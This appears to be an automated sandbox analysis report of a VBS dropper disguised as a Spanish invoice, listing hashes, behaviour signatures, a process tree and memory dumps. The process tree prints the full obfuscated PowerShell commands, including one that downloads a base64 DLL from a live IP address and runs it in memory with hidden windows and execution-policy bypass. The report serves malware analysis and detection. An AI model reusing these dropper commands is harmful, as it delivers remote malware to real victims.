Analysis

  • max time kernel
    29s
  • max time network
    33s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    30/03/2023, 07:12

General

  • Target

    Factura por pagar N comprobante electronico 005001000603211.vbs

  • Size

    912KB

  • MD5

    2c9e2087047f7eb65a42a31a8407b6d7

  • SHA1

    3686d693284171f624a9ecfaa8e0ec20cfc67791

  • SHA256

    da9f30f6467709340226de7f1e28a62620a6939ed92a60b524dc57e8b486d807

  • SHA512

    6d87c5f1098e9da24df1c090f69be76f26e321437cb8cfd4aec3d6faafd97a37b86d2761f4d12f00e6e098512009d2e8ff62eedf7a2103db42ce223416361731

  • SSDEEP

    6144:8WkHWkXWkHWk3WkHWkCWkHWkxWkHWk0WkHWknWkHWk8WkHWkDWkHWkEWkHWkkWkL:x

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://5.42.199.235/dll/dll3.txt

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Factura por pagar N comprobante electronico 005001000603211.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2024
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\Windows\Temp\Debug.vbs
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:864
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'JABSAG8AZABhAEMAbwBwAaoUWkAIAA9ACAAJwBaoUWAGkAcQBaoUWACcAOwBbAEIAeQB0AGUAWwBdAF0AIAAkAEQATABMACAAPQAgAFsAcwB5AaoUWMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAaoUWMAZQA2ADQAUwB0AaoUWIAaQBuAGcAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAaoUWQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AaoUWIAaQBuAGcAKAAnAGgAdAB0AaoUWAAOgAvAC8ANQAuADQAMgAuADEAOQA5AC4AMgAzADUALwBkAGwAbAAvAGQAbABsADMALgB0AaoUWgAdAAnACkAKQA7AFsAcwB5AaoUWMAdABlAG0ALgBBAaoUWAAcABEAG8AbQBhAGkAbgBdADoAOgBDAaoUWUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQARABMAEwAKQAuAEcAZQB0AFQAeQBwAGUAKAAnAEMAZABXAEQAZABCAC4ARABLAGUAUwB2AGwAJwApAC4ARwBlAaoUWQATQBlAaoUWQAaABvAGQAKAAnAE4AbgBJAGEAVQBxACcAKQAuAEkAbgB2AG8AawBlACgAJABuAaoUWUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdACAAKAAnADAALwBpAEUANwBqAE4ALwBkAC8AZQBlAC4AZQB0AaoUWMAYQBwAC8ALwA6AaoUWMAcAB0AaoUWQAaAAnACAALAAgACQAUgBvAGQAYQBDAG8AcAB5ACAALAAgACcARQBZAGoAQwAnACwAIAAnADAAJwAsACAAJwAxACcALAAgACcAJwAgACkAKQA=';$pvNxls = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $iUqm.replace('aoUW','H') ) );$pvNxls = $pvNxls.replace('GiqG', 'C:\Users\Admin\AppData\Local\Temp\Factura por pagar N comprobante electronico 005001000603211.vbs');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $pvNxls
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1672
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$RodaCopy = 'C:\Users\Admin\AppData\Local\Temp\Factura por pagar N comprobante electronico 005001000603211.vbs';[Byte[]] $DLL = [system.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://5.42.199.235/dll/dll3.txt'));[system.AppDomain]::CurrentDomain.Load($DLL).GetType('CdWDdB.DKeSvl').GetMethod('NnIaUq').Invoke($null, [object[]] ('0/iE7jN/d/ee.etsap//:sptth' , $RodaCopy , 'EYjC', '0', '1', '' ))"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:828

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    88fe708249f98cf20a5f07ab16f0e60d

    SHA1

    e13f438193a9905a5733fb219c95a123cd16c307

    SHA256

    6506cbd91e1f98a059f2eaa4785c27012b89abaa5994bc6a4cc965e3203c7fdd

    SHA512

    d9116fa45525aba80f9166bb572150e86139087e4d3c1b97b8c4c3d50b2e3af06392b087bee1b91fa61879171b36e14b4dd1341c5fa9162f1261fa9b462121e7

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    88fe708249f98cf20a5f07ab16f0e60d

    SHA1

    e13f438193a9905a5733fb219c95a123cd16c307

    SHA256

    6506cbd91e1f98a059f2eaa4785c27012b89abaa5994bc6a4cc965e3203c7fdd

    SHA512

    d9116fa45525aba80f9166bb572150e86139087e4d3c1b97b8c4c3d50b2e3af06392b087bee1b91fa61879171b36e14b4dd1341c5fa9162f1261fa9b462121e7

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SXDNZ4YMP6OYXYQB2SGS.temp

    Filesize

    7KB

    MD5

    88fe708249f98cf20a5f07ab16f0e60d

    SHA1

    e13f438193a9905a5733fb219c95a123cd16c307

    SHA256

    6506cbd91e1f98a059f2eaa4785c27012b89abaa5994bc6a4cc965e3203c7fdd

    SHA512

    d9116fa45525aba80f9166bb572150e86139087e4d3c1b97b8c4c3d50b2e3af06392b087bee1b91fa61879171b36e14b4dd1341c5fa9162f1261fa9b462121e7

  • memory/828-82-0x0000000002710000-0x0000000002718000-memory.dmp

    Filesize

    32KB

  • memory/828-81-0x00000000028F0000-0x0000000002970000-memory.dmp

    Filesize

    512KB

  • memory/828-80-0x00000000028F0000-0x0000000002970000-memory.dmp

    Filesize

    512KB

  • memory/828-79-0x00000000028F0000-0x0000000002970000-memory.dmp

    Filesize

    512KB

  • memory/864-59-0x0000000001FC0000-0x0000000001FC8000-memory.dmp

    Filesize

    32KB

  • memory/864-61-0x0000000002834000-0x0000000002837000-memory.dmp

    Filesize

    12KB

  • memory/864-63-0x000000000283B000-0x0000000002872000-memory.dmp

    Filesize

    220KB

  • memory/864-58-0x000000001B270000-0x000000001B552000-memory.dmp

    Filesize

    2.9MB

  • memory/1672-70-0x0000000002620000-0x00000000026A0000-memory.dmp

    Filesize

    512KB

  • memory/1672-78-0x0000000002620000-0x00000000026A0000-memory.dmp

    Filesize

    512KB

  • memory/1672-72-0x0000000002620000-0x00000000026A0000-memory.dmp

    Filesize

    512KB

  • memory/1672-71-0x0000000002620000-0x00000000026A0000-memory.dmp

    Filesize

    512KB

  • memory/1672-69-0x0000000001E60000-0x0000000001E68000-memory.dmp

    Filesize

    32KB

  • memory/1672-68-0x000000001B290000-0x000000001B572000-memory.dmp

    Filesize

    2.9MB